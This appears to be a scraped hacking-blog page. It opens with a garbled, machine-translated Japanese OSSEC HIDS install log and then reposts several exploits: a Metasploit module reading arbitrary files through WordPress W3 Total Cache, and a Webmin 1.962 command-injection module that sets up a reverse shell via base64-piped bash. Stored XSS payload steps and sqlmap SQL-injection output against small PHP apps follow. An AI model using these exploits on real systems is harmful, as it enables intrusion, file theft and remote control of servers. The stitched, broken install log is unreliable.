r/bin:/root/bin:/usr/local/mysql/bin:/usr/local/jdk1.7.09 //bin:/root/bin) ** ParaInstalaçãoEmPortuguês、Escolha [BR]。 **中国語にインストールするには、[CN]を選択します。 ** fur eine deutscheのインストールwohlen sie [de]。 **γιαεγκατλτασησταελληνικ最初、επιλέξτε [EL]。 **英語にインストールするには、[en]を選択します。 **パラInstalar enespañol、eliga [es]。 ** uneのインストールをfrançais、 choissez [fr] ** MagyarNyelvűTelepítéshezVálassza [hu]。 **イタリアーノのl'intectazioneあたり、Scegli [それ]。 **日本語《インストールします.以下を選択してください。 [JP]。 **ヘットネダーランドのキーズのvoor installatie [NL]。 ** AbyInstalowaćWJęzykuPolskim、Wybierz [PL]。 **дляинстрокцпо陶器するげするげすると 、ведите[ru]。 ** za instalaciju na srpskom、izaberi [sr]。 **TürkçeKurulumIçinSeçin[Tr]。 (en/br/cn/de/el/es/fr/hu/it/jp/nl/pl/ru/sr/tr)[en] : cn which:ホストはありません (/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/sbin:/us r/bin:/root/bin:/usr/local/mysql/bin:/usr/local/jdk1.7.09 //bin:/root/bin) Ossec Hids v2.7.1インストールスクリプト-http://www.ossec.net OSSEC HIDSのインストールを開始します。 Cコンパイラがマシンに正しく取り付けられていることを確認してください。 ご質問や提案がある場合は、dcid@ossec.net(またはdaniel.cid@gmail.com)にメールしてください。 - システムタイプ: Linux ossec-server.com 2.6.32-431.el6.x86_64 - ユーザー:ルート -Host : ossec-server.com - Enterを押して続行するか、CTRL-Cを終了して終了します。 - 1-どのインストール(サーバー、エージェント、ローカル、またはヘルプ)が必要ですか? サーバ - サーバータイプのインストールが選択されました。 2-インストール環境の初期化。 -OssecHids [/usr/local/ossec] :/usr/local/ossecのインストールパスを選択してください -OSSECHIDSは/USR/Local/OSSECにインストールされます。 3- OSSEC HIDSの構成。 3.1-電子メールアラートを受け取りたいですか? (y/n)[y] : y - 電子メールアドレスを入力してください。 root@backlion.org -SMTPサーバーIPまたはホスト名を入力してください。 127.0.0.1 3.2-システムの整合性検出モジュールを実行しますか? (y/n)[y] : y - システム整合性検出モジュールが展開されます。 3.3- rootkit検出を実行しますか? (y/n)[y] : y -RootKit検出が展開されます。 3.4-関連する応答を使用すると、aを実行できます 定義されたコマンド。 たとえば、特定のIPアドレスへのアクセスをブロックしたり、特定のユーザーへのアクセスを無効にしたりできます。 詳細については、をご覧ください http://www.ossec.net/en/manual.html#active-response - アクティブな応答関数を有効にしますか? (y/n)[y] : y -Association Responseが有効になります - デフォルトでは、ホストの拒否とファイアウォールの両方の拒否の両方を有効にします。 最初のケースでは、/etc /hosts.denyにホストを追加します。 2番目のケースは、iPtables(Linux)またはIPFilter(Solaris、 ホストへのアクセスは、FreeBSDまたはNetBSDで拒否されます。 - この機能は、SSHDブルートフォース攻撃、ポートスキャンなどをブロックするために使用できます いくつかの形式の攻撃。他の場所に追加することもできます。 たとえば、それらを鼻のイベントとして追加します。 - ファイアウォールドロップ機能を有効にしますか? (y/n)[y] : y - イベントレベル=6のときにファイアウォールドロップが開始されます - リンケージ関数のデフォルトのホワイトリストは:です - 172.16.91.130 #ossecサーバーIP - ホワイトリストにIPSを追加しますか? (Y/N)? [n] : n 3.5-リモートマシンSyslog(ポート514 UDP)を受け取りたいですか? (y/n)[y] : y - リモートマシンSyslogが受信されます。 3.6-ログ:を分析するには、構成ファイルを設定します - /var/log/メッセージ - /var/log/secure - /var/log/maillog - 他のファイルを監視する場合は、構成ファイルossec.confにある必要があります 新しいアイテムを追加します。 構成に関する質問はhttp://www.ossec.netにあります。 5。サーバーを構成して正常に動作させるために、次のコマンドを実行してデータベースサポートを有効にします [root@localhost] Ossec-Hids-2.8.3]#/var/ossec/bin/ossec-control enableデータベース 6. mysqlテーブル構造をmysqlにインポートします [root@localhost] ossec-hids-2.8.3]# mysql -uossec -p ossec src/os_dbd/mysql.schema 7.構成ファイルの権限を変更すると、サービスが開始されます。 [root@localhost] など]#chmod u+w/var/ossec/etc/ossec.conf 8。OSSEC.CONFファイルを編集し、OSSEC_CONFIGでMySQL構成を追加します database_output hostnameLocalhost/hostname usernameossec/username PasswordDossec/パスワード Databaseossec/データベース typemysql/type /database_output 9.リモートマシンをサポートするサーバーインストールプロセス中にSyslogが設定されるため、ossec.confファイルのsyslogパーツを構成する必要があり、ossec.confファイルを変更する必要があり、収集する必要があるすべてのネットワークセグメントが追加されます。 リモート connectionsyslog/connect
  21. HireHackking

    WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework # ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner def initialize(info = {}) super( update_info( info, 'Name' => 'WordPress W3 Total Cache File Read Vulnerability', 'Description' => %q{ This module exploits an unauthenticated directory traversal vulnerability in WordPress plugin 'W3 Total Cache' version 0.9.2.6-0.9.3, allowing arbitrary file read with the web server privileges. }, 'References' => [ ['CVE', '2019-6715'], ['WPVDB', '9248'], ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-6715'], ['URL','https://vinhjaxt.github.io/2019/03/cve-2019-6715'], ], 'Author' => [ 'VinhJAXT', # Vulnerability discovery 'Hoa Nguyen - SunCSR Team' # Metasploit module ], 'DisclosureDate' => '2014-09-20', 'License' => MSF_LICENSE ) ) register_options( [ OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']), OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 2]) ] ) end def check check_plugin_version_from_readme('w3-total-cache', '0.9.4', '0.9.26') end def run_host(ip) traversal = '../' * datastore['DEPTH'] filename = datastore['FILEPATH'] filename = filename[1, filename.length] if filename =~ %r{^/} json_body = { 'Type' => "SubscriptionConfirmation", 'Message' => '', 'SubscribeURL' => "file:///#{traversal}#{filename}" } res = send_request_cgi({ 'method' => 'PUT', 'uri' => normalize_uri(wordpress_url_plugins, 'w3-total-cache', 'pub','sns.php'), 'ctype' => 'application/json', 'data' => JSON.generate(json_body) }) fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' unless res.code == 200 fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero? print_status('Downloading file...') print_line("\n#{res.body}\n") fname = datastore['FILEPATH'] path = store_loot( 'w3_total_cache.traversal', 'text/plain', ip, res.body, fname ) print_good("File saved in: #{path}") end end
  22. HireHackking

    Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Webmin 1.962 - Package Update Escape Bypass RCE (Metasploit)', 'Description' => %q( This module exploits an arbitrary command execution vulnerability in Webmin 1.962 and lower versions. Any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges. It emerged by circumventing the measure taken for CVE-2019-12840. s/\\(-)|\\(.)/string/g; escape is not enough for prevention. Therefore, since the package name variable is placed directly in the system command, we can manipulate it using some escape characters that HTTP supports. For example, we can escape control by dropping the command line down one line. We can do this with "%0A" and "%0C" urlencoded row values.Also, for paylad to work correctly, we must add double an ampersand(&&) to the end of the payload (%26%26) ), 'Author' => [ 'AkkuS <Özkan Mustafa Akkuş>' # Vulnerability Discovery, MSF PoC module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', 'CVE-2020-35606'], ['URL', 'https://www.pentest.com.tr/exploits/Webmin-1962-PU-Escape-Bypass-Remote-Command-Execution.html'] ], 'Privileged' => true, 'Payload' => { 'DisableNops' => true, 'Space' => 512, 'Compat' => { 'PayloadType' => 'cmd' } }, 'DefaultOptions' => { 'RPORT' => 10000, 'SSL' => false, 'PAYLOAD' => 'cmd/unix/reverse_perl' }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [['Webmin <= 1.962', {}]], 'DisclosureDate' => '2020-12-21', 'DefaultTarget' => 0) ) register_options [ OptString.new('USERNAME', [true, 'Webmin Username']), OptString.new('PASSWORD', [true, 'Webmin Password']), OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/']) ] end def peer "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" end def login res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'session_login.cgi'), 'cookie' => 'testing=1', # it must be used for "Error - No cookies" 'vars_post' => { 'page' => '', 'user' => datastore['USERNAME'], 'pass' => datastore['PASSWORD'] } }) if res && res.code == 302 && res.get_cookies =~ /sid=(\w+)/ return $1 end return nil unless res '' end def check cookie = login return CheckCode::Detected if cookie == '' return CheckCode::Unknown if cookie.nil? vprint_status('Attempting to execute...') # check version res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, "sysinfo.cgi"), 'cookie' => "sid=#{cookie}", 'vars_get' => { "xnavigation" => "1" } }) if res && res.code == 302 && res.body version = res.body.split("Webmin 1.")[1] return CheckCode::Detected if version.nil? version = version.split(" ")[0] if version <= "962" # check package update priv res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "package-updates/"), 'cookie' => "sid=#{cookie}" }) if res && res.code == 200 && res.body =~ /Software Package Update/ print_status("NICE! #{datastore['USERNAME']} has the right to >>Package Update<<") return CheckCode::Vulnerable end end end print_error("#{datastore['USERNAME']} doesn't have the right to >>Package Update<<") print_status("Please try with another user account!") CheckCode::Safe end def exploit cookie = login if cookie == '' || cookie.nil? fail_with(Failure::Unknown, 'Failed to retrieve session cookie') end print_good("Session cookie: #{cookie}") res = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri, 'proc', 'index_tree.cgi'), 'headers' => { 'Referer' => "#{peer}/sysinfo.cgi?xnavigation=1" }, 'cookie' => "sid=#{cookie}" ) unless res && res.code == 200 fail_with(Failure::Unknown, 'Request failed') end print_status("Attempting to execute the payload...") run_update(cookie) end def run_update(cookie) @b64p = Rex::Text.encode_base64(payload.encoded) perl_payload = 'bash -c "{echo,' + "#{@b64p}" + '}|{base64,-d}|{bash,-i}"' payload = Rex::Text.uri_encode(perl_payload) res = send_request_cgi( { 'method' => 'POST', 'cookie' => "sid=#{cookie}", 'ctype' => 'application/x-www-form-urlencoded', 'uri' => normalize_uri(target_uri.path, 'package-updates', 'update.cgi'), 'headers' => { 'Referer' => "#{peer}/package-updates/?xnavigation=1" }, # new vector // bypass to backslash %0A%7C{}%26%26 'data' => "redir=%2E%2E%2Fsquid%2F&redirdesc=Squid%20Proxy%20Server&mode=new&u=squid34%0A%7C#{payload}%26%26" # for CVE-2019-12840 #'data' => "u=acl%2Fapt&u=%20%7C%20#{payload}&ok_top=Update+Selected+Packages" }) end end
  23. HireHackking

    Multi Branch School Management System 3.5 - "Create Branch" Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Multi Branch School Management System 3.5 - "Create Branch" Stored XSS # Exploit Author: Kislay Kumar # Date: 2020-12-21 # Google Dork: N/A # Vendor Homepage: https://www.ramomcoder.com/ # Software Link: https://codecanyon.net/item/ramom-multi-branch-school-management-system/25182324 # Affected Version: 3.5 # Category: Web Application # Tested on: Kali Linux Step 1. Login as Super Admin. Step 2. Select "Branch" from menu and after that click on "Create Branch". Step 3. Insert payload - "><img src onerror=alert(1)> in "Branch Name" , "School Name" , "Mobile No." , "Currency" , "Symbol" , "City" and "State". Step 4. Now Click on "Save" and you will get a list of alert boxes.
  24. HireHackking

    Faculty Evaluation System 1.0 - Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Faculty Evaluation System 1.0 - Stored XSS # Exploit Author: Vijay Sachdeva (pwnshell) # Date: 2020-12-22 # Vendor Homepage: https://www.sourcecodester.com/php/14635/faculty-evaluation-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14635&title=Faculty+Evaluation+System+using+PHP%2FMySQLi+with+Source+Code # Tested on Kali Linux Step 1: Log in to the application with admin credentials Step 2: Click on Questionnaires, then click "Action" for any Academic Year and then click manage. Step 3. Input "<script>alert("pwnshell")</script>" in "Question" field of the Question form. Step 4. Click on "Save" when done and this will trigger the Stored XSS payloads. Whenever you click on Questionnaires, click action for any academic year, and then manage, your XSS Payloads will be triggered for that "Academic Year"
  25. HireHackking

    Artworks Gallery Management System 1.0 - 'id' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Artworks Gallery Management System 1.0 - 'id' SQL Injection # Exploit Author: Vijay Sachdeva # Date: 2020-12-22 # Vendor Homepage: https://www.sourcecodester.com/php/14634/artworks-gallery-management-system-php-full-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14634&title=Artworks+Gallery+Management+System+in+PHP+with+Full+Source+Code # Affected Version: Version 1 # Tested on Kali Linux Step 1. Log in to the application with admin credentials. Step 2. Click on "Explore" and then select "Artworks". Step 3. Choose any item, the URL should be " http://localhost/art-bay/info_art.php?id=6 Step 4. Run sqlmap on the URL where the "id" parameter is given sqlmap -u "http://192.168.1.240/art-bay/info_art.php?id=8" --banner --- Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=8 AND 4531=4531 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: id=8 AND (SELECT 7972 FROM (SELECT(SLEEP(5)))wPdG) Type: UNION query Title: Generic UNION query (NULL) - 9 columns Payload: id=8 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b627171,0x63435455546f41476e584f4a66614e445968714d427647756f6f48796153686e756f66715875466c,0x716a6b6b71)-- - --- [08:18:34] [INFO] the back-end DBMS is MySQL [08:18:34] [INFO] fetching banner back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) banner: '10.3.24-MariaDB-2' --- Step 5. Sqlmap should inject the web-app successfully which leads to information disclosure.